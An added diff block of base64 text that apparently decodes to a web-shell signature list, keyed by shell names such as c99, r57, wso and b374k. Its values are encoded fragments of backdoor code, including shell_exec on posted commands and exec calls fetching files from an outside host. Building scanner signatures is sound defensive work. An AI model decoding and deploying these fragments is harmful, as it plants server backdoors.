+Z1BTQWtZbmwwWlhNN0NpQWdKRVJEUTNza1pHTmpjMjkiO3M6MTc6InBlcmxib3RbMF1bMV1bcGxd
+IjtzOjY0OiJ6SWl3aVFXeGhkbWtpTENKQmJHTnZjbTRpTENKQmJHUmhJaXdOQ2lKQmJHVnJjeUlz
+SWtGc2JHbHpiMjRpTENKIjtzOjE4OiJoYXJhdWt1WzBdWzBdW3BocF0iO3M6NjQ6IkV0YWJERkti
+R2NOQ2pWR00xVkRhbXhQWlVkb1dIcGtkMWxUVFRsdVVIcG5abHBqUkVwVlkyWlFXR2sxWWtGTU0i
+O3M6MTc6ImIzNzRrWzExXVswXVtwaHBdIjtzOjY0OiJkSFJaVW1GQ1YybE1URlZ5U0hseFpITjVN
+R0U1VUhSbkwyWXdUSEp4Tm5ad1VXWTBPR3czT0RJM1lYTlFlVmRTIjtzOjE0OiJjOTlbMV1bMF1b
+cGhwXSI7czo2NDoiRXRhU0IxTFdrZ2VDMXBJRkF0YVNBMExXa2dNaTFwSUZRdGFTQktMV2tnVGkx
+cElHUXRhU0IzTFdrZ01TMXBJSCI7czoxOToicGhwc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiSUdK
+eVpXRnJPd3A5Q21sbUlDZ2hKR3hsYmlrZ2V3b0pJeUJYWlNCbVlXbHNaV1FnYjI0Z2RHaGxJRzFo
+YVc0ZyI7czoyMToibWV0YXNwbG9pdFswXVswXVtwaHBdIjtzOjY0OiJEMGdiWGx6Y1d4ZmJHbHpk
+RjlrWW5Nb0pITnhiRjl6YjJOcktUc05DaUFnSUdsbUlDZ2hKSEpsYzNWc2RDa2dlIjtzOjE1OiJj
+MTAwWzBdWzBdW3BocF0iO3M6NjQ6Ik5vYnlBaVJtRnBiQ0k3Q2drSkNYSmxkSFZ5YmpzS0NRbDlD
+Z2tKSkdOdmJDQTlJRzE1YzNGc1gyNTFiVjltYVciO3M6MTk6IndlYm15c3FsWzBdWzBdW3BocF0i
+O3M6NjQ6IlpHVnpJSFpsYm1GdWRDQmtaU0JRU0ZBaU93cDlDZ3BwWmlna2IzQjBhVzl1SUQwOUlE
+SXBld29nSUNBZ2NISnAiO3M6MTk6ImJhY2tkb29yWzJdWzBdW3BocF0iO3M6NjQ6ImJrcGlaRGty
+TkhGelZqWmFXa1pRVjFSUllVSnNZMmsxUzJOSGFERTNXVTVRVG14Vk9DSXNJalZXUlVReldrdEUi
+O3M6MTk6InBocHNoZWxsWzhdWzBdW3BocF0iO3M6NjQ6IlBEOXdhSEFOQ21sbUtDUmZVRTlUVkZz
+aWNHRnpjeUpkSUQwOUlDSXlOak5qWkRkaFpUVXdOemhoT0RReFpUQXgiO3M6MTQ6ImNtZFs4XVsw
+XVtwaHBdIjtzOjY0OiJSWFJ6VEd0MlkxZEdXV3R1TDFsUmIyOWFNVGRHYURCSVJHVk5XRkJqUlVK
+VVdUZzNiMDgyV0dWSlNHdDFRbmxqIjtzOjE1OiJ3c29bMTldWzBdW3BocF0iO3M6NjQ6ImMzUWdQ
+U0FuSWlJbk93b2dJSDBnWld4elpTQjdDaUFnSUNBa1pYTmpZWEJsWkNBOUlHRnljbUY1WDIxaGND
+Z24iO3M6MTk6InNpbXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6IkdWeWJYTTlKSFI1Y0dWYk1GMDdD
+aUFrY0dWeWJYTXVQU2drYlc5a1pTQW1JREF3TkRBd0tTQS9JQ0p5SWlBNkkiO3M6MTQ6Imdmc1sw
+XVswXVtwaHBdIjtzOjY0OiI3Q2lBZ0lDQWdJQ0FnZlFvZ0lDQWdmUXA5Q2o4K0NqeGljajRLUEhS
+bGVIUmhjbVZoSUc1aGJXVTlJbk5vWld4IjtzOjE4OiJteXNoZWxsWzBdWzBdW3BocF0iO3M6NjQ6
+IlFwR2IyeGtaWEpCZEhSeWFXSjFkR1Z6SUQwZ0lsTjVjM1JsYlN3Z1JHbHlaV04wYjNKNUlncGpZ
+WE5sSURJeUkiO3M6MTg6Im50ZGFkZHlbMF1bMF1bYXNwXSI7czo2NDoiN0RRb2dJR1ZqYUc4Z0lr
+WnNkWE5vWEc0aU93MEtJQ0JsWTJodklDSThkV3crWEc0aU93MEtJQ0JsWTJodklDSSI7czoxNjoi
+bXlzcWxbN11bMF1bcGhwXSI7czo2NDoiMVJWTUU1RVRYcE9WRWw1V2tSYWJFOUVZek5OZWtFd1Qx
+ZE9hVmt4YzJsYVdHaHNXVE5XTUZwVFNtUkpSREJuUyI7czoxODoidGRzaGVsbFsxXVswXVtwaHBd
+IjtzOjY0OiJRMWd3VjFaRlZIVjZURE41VkUxNWNWRkhZVmRFU0ZOYVpVWlFPV1JHUjAwMmIzZDVN
+WEpoWXpOQk0yTlNTbEZOIjtzOjE5OiJmaWxlc21hblsxXVswXVtwaHBdIjtzOjY0OiJkT1NFWlJN
+RGt2V1VkQmRHSjFjWFo0ZEhwVWNYcDRPVXhKTVZrNE4wa3lVRlJ6UzI1MFVFdFZWVkZqUWxwdFNH
+IjtzOjE0OiJjOTlbMl1bMF1bcGhwXSI7czo2NDoia1ZVTGoxbVoyVjBjeWdrWml3Z05EQTVOaUFw
+T3dvSlptTnNiM05sS0NBa1ppQXBPd29LQ1hCeWFXNTBJQ0pjYiI7czoxODoiZHhzaGVsbFsxXVsw
+XVtwaHBdIjtzOjY0OiJEcThPdHc2WERyY09vdzZVZ3c2L0RzTU91dzZqRHA4T2l3NjdEcThPOHc2
+M0Ryc09qdzY0Z1VFaFFMY09xdzY3IjtzOjE0OiJjOTlbOF1bMF1bcGhwXSI7czo2NDoiZG1Gc2RX
+VTlJaTlsZEdNdmMzbHpiRzluTG1OdmJtWWlQbE41YzJ4dlp5QkJlV0Z5YkdGeWFUd3ZiM0IwYVc5
+dSI7czoxOToic3B5c2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiSmNJajRpTGlSMllXeDFaUzRpTHp3
+dlFUNGdJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWlMbVJoZEdVb0luSWlMRyI7czoxOToiYmFja2Rv
+b3JbMV1bMF1bcGhwXSI7czo2NDoiaUJ2ZEdobGNpQm1jbVZsSUc5eUlHOXdaVzRnYzI5MWNtTmxJ
+SE52Wm5SM1lYSmxJR3hwWTJWdWMyVnpMZ29nSyI7czoxNToiYzk5WzI3XVswXVtwaHBdIjtzOjY0
+OiJQRDl3YUhBTkNtVmphRzhnSWp4b016NVhiM0pyY3lFZ1ZYTmhaMlU2SUdjd01HNHVjR2h3UDJj
+d01HNDlXME5OIjtzOjE1OiJjbWRbMzBdWzBdW3BocF0iO3M6NjQ6IlYwWlhJbkxBb25jbVZ6WlhR
+bklEMCtJQ2RTdzZscGJtbDBhV0ZzYVhObGNpY3NDaWR5Wld4aGRHbDJaU2NnUFQiO3M6MTc6Imhh
+Y2tlclswXVswXVtwaHBdIjtzOjY0OiJHVnliWE1OQ2lBZ1EyRnNiQ0J2VXk1U2RXNG9JbmRwYmk1
+amIyMGdZMjFrTG1WNFpTQXZZeUJqWVdOc2N5NWxlIjtzOjE1OiJjbWRbMTVdWzBdW2FzcF0iO3M6
+NjQ6IjJobGNpQnNaWFpsYkhNZ1BDOWthWFkrSUFvZ0lDQWdQQzltYjNKdFBpQUtJQ0FnSUR3dmRH
+UStJQW9nSUR4MFoiO3M6MTY6ImMyMDA3WzBdWzBdW3BocF0iO3M6NjQ6ImQwNHlkSFpXUldoTFlt
+MW9hVk5JYkZKaFYxSldZbGh3YTJKSGQzcFdSelY0V2pOYWRsUllhREpPVjNONFRtczUiO3M6MTQ6
+Indzb1s3XVswXVtwaHBdIjtzOjY0OiJSVFY2ZUhWellUTXZLM1JxTlRKYVIxWmphRzQ1VGxkcWMw
+bHlUM2M1S3k5eWRXWXlSbmhyTVZsa2VtaGlOekJoIjtzOjIwOiJmaWxlc21hblsyM11bMF1bcGhw
+XSI7czo2NDoiQ1l1Znk4eVMzaHJLMUpUUkdKUEt5eEtSVnN4WEZjbmNrcEFJMEFtTGl0cmQxY0pa
+RzVTVTBSaVdXNVFSVVZNVyI7czoxODoiaW5kZXhlclswXVswXVthc3BdIjtzOjY0OiJ5VHpoMU1s
+WTRiMmhLV1VNcllrWnhTbXRvZVZjNGJqSktTa05VWVRkSE4xb3hZbm93ZG1WTFVFNTJka0pHZFdW
+IjtzOjE4OiJ3ZWJyb290WzFdWzBdW3BocF0iO3M6NjQ6Ikk4TDI5d2RHbHZiajVjY2x4dUlqc05D
+aUFnSUNCOURRb2dJSDBOQ2lBZ1pXTm9ieUFpUEM5elpXeGxZM1ErWEgiO3M6MjI6IkZhVGFMaXNU
+aUN6WzBdWzBdW3BocF0iO3M6NjQ6IkF2WjNKbGNDNTBlSFFuTEFvbmJHOWpZWFJsSUdOdmJtWnBa
+eTV3YUhBZ1ptbHNaWE1nUGo0Z0wzUnRjQzluY20iO3M6MTU6InI1N1sxNF1bMF1bcGhwXSI7czo2
+NDoiSHBqTUdSbENnb2thbUZ0WlhNd1ltRnpkR1Z5SUQwZ0lqZFlNVGRsT1hFME9IWkVaak5sWmxv
+M05rSTJZM2hpVyI7czoxNjoiYjM3NGtbNV1bMF1bcGhwXSI7czo2NDoia2IwNDRhbmRSUVdSRlZs
+Y0tWbGt4Y2tWUU9WVnFkMUprV0c5MFpFUkJka0ZrUkU0MFVFbDBOME5HVUc5eFpqYyI7czoxNDoi
+ZngwWzNdWzBdW3BocF0iO3M6OTU6ImJiOkpGOWZYMTlmS3lzcGV5UmZYMTlmV3lSZlgxOWZYMTA5
+WTJoeUtDZ2diM0prS0NSZlgxOWZXeVJmWDE5ZlgxMHBMVzl5WkNna1gxOWZXeVJmWDE5ZlgxMHBL
+UT09IjtzOjE0OiJwYXNbMF1bMF1bcGhwXSI7czo2NDoiWFNrN0RRb2dJQ0FnSUNBZ0lHVmphRzhn
+SWp3dmRHVjRkR0Z5WldFK0lqc2dJQ0FnWkdsbEtDazdEUW9nSUNBZyI7czoxOToiZ3Njc2hlbGxb
+MF1bMF1bcGhwXSI7czo2NDoic0lDUjFjR3h2WVdSbWFXeGxLU2tnZXdvZ0lDQWdaV05vYnlBaTFP
+RHA2KzRnOC9IdjVmanQ3aURuNE9QdzgrYiI7czoyMToia2Fkb3RzaGVsbFswXVswXVtwaHBdIjtz
+OjY0OiJnSUNBZ1BIUmtJSGRwWkhSb1BTSXlNVGtpUGcwS0lDQWdJQ0FnSUNBOFptOXVkQ0J6YVhw
+bFBTSXRNeUlnWm1GIjtzOjE1OiJzcGFtWzNdWzBdW3BocF0iO3M6NjQ6Ikl3VFdwcWNUQlRkSEps
+Y0daUVdVb3pjVzkwZG5remEzUkxhMDgzTjJoV09YZzJUQzgxVW5VMWEwbFZSV0oyT0QiO3M6MTU6
+ImM5OVsxM11bMF1bcGhwXSI7czo2NDoiZUZNNUszaDFkREl3VWtWRVlXWnJRbUZOYVVSMFNVTkVk
+RTFEUkhSNVMxQkpkbXcxUlRaUGVWZFlNMFJHWm5aSyI7czoxNToiYzk5WzE3XVswXVtwaHBdIjtz
+OjY0OiJHRnNiRzkzTEdSbGJua0tJQ0FnSUVGc2JHOTNJR1p5YjIwZ1lXeHNDand2Um1sc1pYTStD
+Z29qSUUxaGEyVWdMIjtzOjMwOiJodGFjY2Vzc19zaGVsbFswXVswXVtodGFjY2Vzc10iO3M6NjQ6
+ImdQejgvUHo4L1B6OC9QeUJ6YUdWc2JDMC9QejgvUHo4Z0tEOC9QejgvSUQ4L1B6OC9QejhzSUQ4
+L1B6OC9JRDgiO3M6MTU6ImM5OVsyNV1bMF1bcGhwXSI7czo2NDoiSUhaaGJIVmxQU0pGYm5SbGNp
+SStDand2ZEdRK1BDOTBjajRLSkhSbGJtUUtTRlJOVERzS0NtbG1JQ2hwYzNObCI7czoxOToia2F1
+c2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiRzlFTURCT1RuSldUMlpPZEZrcmVIRjVOMDR6UVdkbVNW
+ZGlhMHMyZWtrdlkxbFFaM0oxVm5wWGVrc3hORkpvTyI7czoyMDoiZGFya3NoZWxsWzFdWzBdW3Bo
+cF0iO3M6NjQ6ImdQSFJrSUhkcFpIUm9QU0kxTUNVaUlHaGxhV2RvZEQwaU1TSWdkbUZzYVdkdVBT
+SjBiM0FpSUdKblkyOXNiM0kiO3M6MjM6InN0cmVzc2J5cGFzc1sxXVswXVtwaHBdIjtzOjY0OiJ5
+SUZObGNuWmxjaUJwYm5SeWRYTnBiMjQ4TDI5d2RHbHZiajROQ2p4dmNIUnBiMjRnZG1Gc2RXVTlJ
+akUxSWlBIjtzOjE4OiJtYWRzcG90WzBdWzBdW3BocF0iO3M6NjQ6IlRUWnBVa2d6VlVWUWREWnpa
+QzlaY1dGWVlqaHZiVEF6ZUdKMWNVWk5hVzlRWTNsVmRrdFFOblpUVW5wamNXMXAiO3M6MTk6ImZp
+bGVzbWFuWzBdWzBdW3BocF0iO3M6NjQ6Ik5sSUdZdVlYUjBjbWxpZFhSbGN3MEtZMkZ6WlNBd0RR
+cEdiMnhrWlhKQmRIUnlhV0oxZEdWeklEMGdJazV2Y20iO3M6MjI6ImVsbWFsaXNla2VyWzBdWzBd
+W3Zic10iO3M6NjQ6ImhaRGQ0Y1M4ME55dGlaMGx4VDFNeGRtWnBjV2Q0YW10ek1FRkVOa2xJWTJo
+a00zcFZXRGM1ZG5Gd1ZGZGxVeloiO3M6MTU6ImM5OVsyMF1bMF1bcGhwXSI7czo2NDoiU2lzNGEy
+MTZZa3hsYm1aQmVuQkhjVFpsVml0cWRrZHFkazg0VDBKTlVubGFVVE55YzNCdGRDczFUeTlaYXpC
+YSI7czoxNToicjU3WzE4XVswXVtwaHBdIjtzOjY0OiJZV1FnWkdGMFlRb0phV1lvSkVWT1Zuc25R
+MDlPVkVWT1ZGOVVXVkJGSjMwZ1BYNGdMMjExYkhScGNHRnlkRnd2IjtzOjE2OiJ0ZWxuZXRbMV1b
+MF1bcGxdIjtzOjY0OiJQU2N3TkNjN0lHSnlaV0ZyT3cwS0NRa0pDV05oYzJVZ0p6VW5PaUFnSkdS
+aGRHVTlKekExSnpzZ1luSmxZV3M3IjtzOjIwOiJmb3JldmVycHBbMF1bMV1bcGhwXSI7czo2NDoi
+YVhwbElsMDhKRjlRVDFOVVd5Sk5RVmhmUmtsTVJWOVRTVnBGSWwwcENpQWdJQ0I3Q2lBZ0lDQWdJ
+R2xtS0cxdiI7czoyMjoicGhwYmFja2Rvb3JbMV1bMF1bcGhwXSI7czo2NDoiWld4c1BDOTBhWFJz
+WlQ0OGJXVjBZU0JvZEhSd0xXVnhkV2wyUFNKRGIyNTBaVzUwTFZSNWNHVWlJR052Ym5SbCI7czoy
+NToiYW50aWNoYXRfc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiWlEwS0NRa0pDVkpsYzNCdmJuTmxM
+bGR5YVhSbElDSThabTl1ZENCbVlXTmxQU0lpWVhKcFlXd2lJaUJ6YVhwbCI7czoyMToic21hcnRz
+aGVsbFswXVswXVthc3BdIjtzOjY0OiJWa0p5QTlQaUFpUkdsemMyVWdabWxzWlhJZ1pYSWdhMjl3
+YVdWeVpYUWdkR2xzSUZ3aVd5VXlYVndpT2x4dVd5IjtzOjE5OiJ3ZWJhZG1pblsyXVsyXVtwaHBd
+IjtzOjY0OiJNR2MxY2l0cVVXUjZWR3hyTW5kWWFWY3dkMGgxYUZCTmVUSkJSME5wVFdzdmVrNUNU
+RFpyTlhGV1Mwc3dTbTVVIjtzOjE3OiJiMzc0a1sxN11bMF1bcGhwXSI7czo2NDoiUEQ5d2FIQUtM
+eXBqT0RZME9XRTVZVEUyTlRObU9EVXlPRFF6WmpRMFpqa3hObUpqWWpRMFpDb3ZhV1lvYVhOeiI7
+czoxNToiY21kWzE0XVswXVtwaHBdIjtzOjY0OiJGVTNOVlEzUWpKeVJUSTJPVWQ0Y0hCRmRqWjNS
+Rzk1WVNzeGRFNUNkVlZXVURSSFYwRlZMM1p2ZVUxNE1WZ3hXIjtzOjIwOiJwaHBzaGVsbFsyNl1b
+MF1bcGhwXSI7czo2NDoicElIc05DaUFnSUNBZ0lDQWdjSEpwYm5RZ0lrWnBiR1U2SWk0Z0lHSmhj
+MlZ1WVcxbEtDQWtYMFpKVEVWVFd5ZCI7czoyMDoiaXJvbnNoZWxsWzFdWzBdW3BocF0iO3M6NjQ6
+Ik5OV1dwU04wbFVaVFEwWkd0VmMyOUlibmhFV1dNNFpIbHhjbUoyWkdKdGFpdHFZMjg1ZVdOV01t
+dHJVa3BIUmsiO3M6MjI6ImJvZ2VsX3NoZWxsWzFdWzBdW3BocF0iO3M6NjQ6ImlLU0I3RFFvSkNR
+a2tjbVZ6ZFd4MFBYTm9aV3hzWDJWNFpXTW9KRjlRVDFOVVd5ZGpiMjF0WVc1a0oxMHBPdzAiO3M6
+MTU6ImVybmVbMl1bMF1bcGhwXSI7czo2NDoiSUFwT1lXMWxPand2Wm05dWRENDhMMlJwZGo0Z0Nq
+d3ZkR1ErSUFvOGRHUWdkMmxrZEdnOUlqTXhOeUlnWW05eSI7czoyNDoibW9yb2NjYW5fc3BhbVsw
+XVsxXVtwaHBdIjtzOjY0OiJ2Wm05eWJUNDhMM1JrUGp3dmRISStEUW84TDNSaFlteGxQZzBLUEdK
+eVBqeGthWFlnWTJ4aGMzTTlZbUZ5YUdWIjtzOjIzOiJhbnRpc2Vjc2hlbGxbMV1bMF1bcGhwXSI7
+czo2NDoiT1EybEJaMGxEUVdkSlEwRm5TVU5CWjBsRFFXZEpRMEZuU1VOQlowbERRV2RKUTBGblNV
+TkJhMk5IZEcxT1JGWiI7czoxOToiY21vc19jbHJbMF1bMF1bcGhwXSI7czo2NDoiSUR3dlptOXVk
+RDROQ2lBZ0lDQWdJQ0FnSUNBZ0lDQWdQRDl3YUhBZ0RRb3ZMeUJEYUdWamF5Qm1iM0lnVTJGbSI7
+czoxOToiczcyc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoicE93b2dJQ0FnSkhWa0lEMGdkWEpzWlc1
+amIyUmxLQ1JrYVhJcE93b2dJQ0FnSkhWMklEMGdkWEpzWlc1amIyUiI7czoxNToiYzEwMFsxXVsw
+XVtwaHBdIjtzOjY0OiJjbXNnUFNCVFpYSjJaWEl1UTNKbFlYUmxUMkpxWldOMEtDSlhVMk55YVhC
+MExrNWxkSGR2Y21zaUtRb0pDVk5sIjtzOjE3OiJyaHRvb2xbMF1bMF1bYXNwXSI7czo2NDoiOEwz
+UmtQaWNwT3dvSkNRa0pDUWx3S0NjOGRHUStKeTRrY205M1d5ZFRaWEZmYVc1ZmFXNWtaWGduWFM0
+blBDOSI7czoxNzoicGhwc3B5WzNdWzBdW3BocF0iO3M6NjQ6IkNCbWIzSmxZV05vSUNna1lXeHNU
+R2x1YTNNZ1lYTWdKR3RySUQwK0lDUjJkaWw3SUNSaGJHeEViVzV6VzEwZ1AiO3M6Mjc6ImJydXRl
+X2ZvcmNlX3Rvb2xbMF1bMF1bcGhwXSI7czo2NDoiZktDMG9MQ2hkS0RvcmZDZzZMVjhvTENnNktE
+b29YU2hkTENZb1h5aGZLR0F0WGlnc0tEb29MaWhkS0Ywb1hpZyI7czoyMDoicGhwc2hlbGxbMzFd
+WzBdW3BocF0iO3M6NjQ6IkRCbmFFSklSRzVhSzJsSlJFdEdla2RTZVZSalpFNUJXRWQxTUUwNWVr
+WnVVMFUzY1dKRldVWm5lRGRuUjJvd04iO3M6MTU6ImM5OVsyMl1bMF1bcGhwXSI7czo2NDoiaGMz
+TXBLU0I3Q2lBZ0lDQnBaaWhwYzNObGRDZ2tYMUJQVTFSYkozQmhjM01uWFNrZ0ppWWdLRzFrTlNn
+a1gxQiI7czoxNDoid3NvWzRdWzBdW3BocF0iO3M6NjQ6IkxNbUpvYlRFelFrTkxka0pGWm5wdE5V
+czFUMHgyWTNwalFsRnJUbTVpVDJweVpqbFZjRFk1VlVKM1QwOTRNQzkiO3M6MTU6InI1N1sxMF1b
+MF1bcGhwXSI7czo2NDoiVE1XOEtOak50TVc0dmMyRnpaMjVrV0hwV1REUlpSVUZ6VUZWWFpUWnJa
+M1ZwWVZNeFNHRklaRlpEZEFvemFDcyI7czoxOToic2VjNGV2ZXJbMF1bMF1bcGhwXSI7czo2NDoi
+MFJtaHpiMGhzYTNKc1lVWXdaMFY2SzBka2FFTkZkRU5oUVdsWmFXTnFVMHRaVjNOblYwdHpVSFZV
+VEc5TFRWUiI7czoyNToic2hlbGxfdXBsb2FkZXJbNl1bMF1bcGhwXSI7czo2NDoiVlU4dk5FdExh
+elV2SzNWSlQxTmtjM2hsT1dKaWNHSTVNRkJQUm1wQ1dtMW5ZbkZzZG1WT1RrOTJhMnd5Vm1sRiI7
+czoxNDoid3NvWzZdWzBdW3BocF0iO3M6NjQ6ImN5QmhJR052Ym5ObGNYVmxibU5sSUc5bUlIVnph
+VzVuSUhCbFpYSXRkRzh0Y0dWbGNpQjBjbUZ1YzIxcGMzTnAiO3M6MTk6ImZpbGVzbWFuWzJdWzBd
+W3BocF0iO3M6NjQ6IjBLYVdZb0lXVnRjSFI1S0NSZlVrVlJWVVZUVkZzbmJtVjNabWxzWlNkZEtT
+bDdabWxzWlY5d2RYUmZZMjl1ZEciO3M6MTc6ImphY2thbFszXVswXVtwaHBdIjtzOjY0OiJNajRt
+Ym1KemNEc2lMaVIyWVd4MVpYTXVJaVp1WW5Od096d3ZabTl1ZEQ0OEwzUmtQand2ZEhJK0lqc05D
+aUFnIjtzOjE0OiJyNTdbN11bMF1bcGhwXSI7czo2NDoiYzRZMEpHTDNraUxDSm1VVzVGZUZaQ09D
+dEVOVmRFTlhvNFVtOGlMQ0oyVmpjNE9EbGtabWRSYWxGcWFXaENMeiI7czoyMDoicGhwc2hlbGxb
+MTRdWzBdW3BocF0iO3M6NjQ6Ik56UTBMRE13TERNNE56RXNNallzTXpJNE15dzFNeXd5TkRnMUxE
+VTBMRGsxTkRrc05UVXNPRFE0TXl3MU9Td3kiO3M6MTk6IndlYnNoZWxsWzFdWzBdW3BocF0iO3M6
+NjQ6IkFvZ1lYSnlZWGtvSWp4aVBsdFRVVXhkUEM5aVBpSXNKSE4xY213dUltRmpkRDF6Y1d3bVpE
+MGxaQ0lwTEFvZ1kiO3M6MjA6InBocHNoZWxsWzE3XVswXVtwaHBdIjtzOjY0OiJJQ1JzYVc1bEtR
+MEtJQ0FnZXcwS0lDQWdJR2xtSUNnaFpXMXdkSGtvSkd4cGJtVXBLUTBLZXcwS1pXTm9ieUFpIjtz
+OjE1OiJjOTlbMTBdWzBdW3BocF0iO3M6NjQ6IjVRMmR2WjJGWFdXOUtSamxSVkRGT1ZWZDVaRzFp
+TTBwMFdESkdhbVJIYkhaaWFXUmtTVVF3T1VsRVJXZExVVzkiO3M6MTg6Im1ydGlnZXJbMF1bMF1b
+cGhwXSI7czo2NDoiVXRrZG1wWFZEVTJSMjRyVjJKSlZrVjZVVXBzSnl3bmIzWTVkazVpVTJaNU1F
+MTVabkZWVlhRMmRIQkdTeWNzSiI7czoxNToiZW1wb1swXVswXVtwaHBdIjtzOjY0OiJWaE9iRTVx
+VW1aYVIxWnFZakpTYkV0RFVtWlZSVGxVVmtaemFWa3lPV3RhVTBwa1MxTnJOME51TUQwbk95QUtJ
+IjtzOjE1OiJjbWRbMjVdWzBdW3BocF0iO3M6NjQ6IkxWV3R5U2psQ2JYQjJjRW96Yldndk1tNTRP
+RVpzTUdZMVlsUkdPSGd2ZVhjd2NFdFhVbEpEYnl0bVpsVlJkR1YiO3M6MTU6ImM5OVsxNF1bMF1b
+cGhwXSI7czo2NDoicE9VakJvTkRSTWRESTBUREZ2WVd3d2NXSXZaRFEwY1ZOb2NXdzBNMDVQVlc1
+dU1uUXlVWGRFWmtWclpIRnhVaiI7czoyMDoiZmlsZXNtYW5bMjZdWzBdW3BocF0iO3M6NjQ6IjlC
+Umk5RWQzWlphalEyUVdvNGIwUkpTVU5PUlZCc1RtTkZVV3RMUjBGR1pVNTVXbHBvWkVZM1FucGFV
+bGgzWWoiO3M6MTQ6Indzb1syXVswXVtwaHBdIjtzOjY0OiJpSXBLU0I3SUEwS0lDQWdJQ0FnSUds
+bUlDaHBjMTl5WldGa1lXSnNaU2drWkdseWVpa3BJSHNnRFFvZ0lDQWdJIjtzOjIwOiJjb25maWdz
+cHlbMF1bMF1bcGhwXSI7czo2NDoiMlY0WldOMWRHbHZibDl0WlhSb2IyUW9LUXA3Q2lBZ0lDQnBa
+aWhtZFc1amRHbHZibDlsZUdsemRITW9KM0JoYyI7czoyMDoiaXJvbnNoZWxsWzNdWzBdW3BocF0i
+O3M6NjQ6InNlRFJOVjFZMldXeDRORTFVVm1ObFJFRXhXRWhuZDFsV2VEUk5WMUpqWlVSUmQxWldl
+RFJOVkZrelZWWm9ZMlYiO3M6MjI6Impvb21sYV9zcGFtWzBdWzFdW3BocF0iO3M6NjQ6IlBEOXdh
+SEFLTHlwbFl6QXhPVEppTTJGbE5qa3lOREV3T0RsbU5HSTJZbVExWkRZNE5EZzBOQ292YVdZb2FY
+TnoiO3M6MTU6ImNtZFsxMV1bMF1bcGhwXSI7czo2NDoiQ2NzSUNSMGFHVnpaVDBuSnlrZ0x5b2dS
+WEYxWVd3Z2RHOGdSSGhWVWt3b0tTd2dZblYwSUhCeWFXNTBjeUJ2ZCI7czoxODoiZHhzaGVsbFsw
+XVswXVtwaHBdIjtzOjY0OiJWRlVNVTVWVjNsa2QwMXBaR1JNUTBGclpFZFdkR05EYTNCbGR6QkxR
+MUZyU2tOWFZtcGhSemhuVVVkYWNHSkhWIjtzOjE5OiJ2MGxkM20wclsxXVswXVtwaHBdIjtzOjY0
+OiJaV1FnWENJa1ptbHNaVndpUEdKeVBpSTdEUW9nSUNBZ0lDQWdJQ0I5RFFvZ0lDQWdJQ0FnSUdW
+amFHOGdJanhtIjtzOjE5OiJzYWZlbW9kZVs1XVswXVtwaHBdIjtzOjY0OiJaaWhtZFc1amRHbHZi
+bDlsZUdsemRITW9KM041YzNSbGJTY3BLU0I3RFFvZ0lDQWdJQ0JBYjJKZmMzUmhjblFvIjtzOjIy
+OiJGYVRhTGlzVGlDelszXVswXVtwaHBdIjtzOjY0OiJTaWNzSjFKalFXNHhTMGhpUm1Wek9HRmtl
+WFZJT1Njc0owaG9WaTgxWWtKRlpGWkhOVEJ6VjNObGF5Y3NKek0xIjtzOjE3OiJub25hbWVbMF1b
+MF1bcGhwXSI7czo2NDoiRnVQU0l6SWo0bWJtSnpjRHM4SlQxbGJuWXVjWFZsY25sSVlYTm9kR0Zp
+YkdVb0ltOXpMbTVoYldVaUtTVStJRCI7czoyMzoianNwd2Vic2hlbGxbMV1bMF1bamF2YV0iO3M6
+NjQ6IkgwTkNpNXNhWE4wYVc1bklIUm9MbkJsY20xcGMzTnBiMjRnZXlCMFpYaDBMV0ZzYVdkdU9p
+QnNaV1owSUgwTkMiO3M6MTk6IndlYmFkbWluWzVdWzJdW3BocF0iO3M6NjQ6InFPRzVUUzBoWE56
+ZHFTVVZPY2tSU1ptdEZPVTlyWldGbFVUaHdWVlJKZEZCM2JFVk9VSEZvU1hCVmFtdzJUMWwiO3M6
+MTQ6Indzb1s4XVswXVtwaHBdIjtzOjY0OiIxd095QlZjMlZ5Y3lBOEwzQStEUW84Y0NCamJHRnpj
+ejBpYzNSNWJHVXhJajVDZVhCaGMzTThMM0ErRFFvOGNDIjtzOjE3OiJ1czNyc3BsWzBdWzBdW3Bs
+XSI7czoxNTI6IitJR2x1WkdWNExuQm9jQ2NwT3cwS1FHVjRaV01vSjJabGRHTm9JQzF2SUdsdVpH
+VjRMbkJvY0NCb2RIUndPaTh2YUdKaVlpNWpiMjB1WVhVdkxpNHVMMmx1TG5SNGRDY3BPdzBLUUdW
+NFpXTW9KMGRGVkNCb2RIUndPaTh2YUdKaVlpNWpiMjB1WVhVdkxpNHVMMmx1TG5SIjtzOjI1OiJz
+aGVsbF91cGxvYWRlclswXVswXVtwaHBdIjtzOjY0OiJHbHZiajBpUDNrOVBEOXdhSEFnWldOb2J5
+QWtjSGRrT3lBL1BpWmhiWEE3ZUQxMWNHeHZZV1FpSUdWdVkzUjVjIjtzOjIwOiJtMW4xc2hlbGxb
+MF1bMF1bcGhwXSI7czo2NDoiTFZVSnNaVWRXYWt0RFVtcGlWMUZ3VDNkdlNscFhlSHBhVjJ4dFMw
+ZGFNV0p0VGpCaFZ6bDFXREpXTkdGWVRqQiI7czoyNjoic2hlbGxfdXBsb2FkZXJbMTRdWzBdW3Bo
+cF0iO3M6NjQ6InpTR2wxUzFoTk0xbGlhMFUxYjNsaGNHUnVkRWxaT1N0cWJrVkJUblpIYnpGcGJt
+eERUWHBrWmlzMmMzQnBVVTUiO3M6MjA6InBocHNoZWxsWzIwXVswXVtwaHBdIjtzOjY0OiJ6OC9Q
+ejhuTEFvbmNuVmZkR1Y0ZERZbklEMCtKejgvUHo4L1B6OC9QeUEvUHo4L0p5d0tKM0oxWDNSbGVI
+UTNKIjtzOjE0OiJyNTdbNV1bMF1bcGhwXSI7czo2NDoiWmlCdVlXMWxQU0o0Y0NJK0RRb05DZzBL
+UEQ5d2FIQU5DZzBLRFFvZ0lDQWdJQ0JwWmlBb0pGOUhSVlJiSjNWeiI7czoxNzoiY3BhbmVsWzBd
+WzBdW3BocF0iO3M6NjQ6IklnZG1Gc2RXVTlJaWN1YUhSdGJITndaV05wWVd4amFHRnljeWdrWm1s
+c1pTa3VKeUkrUEdsdWNIVjBJSFI1Y0ciO3M6MTc6ImNwYW5lbFsxXVswXVtwaHBdIjtzOjY0OiJt
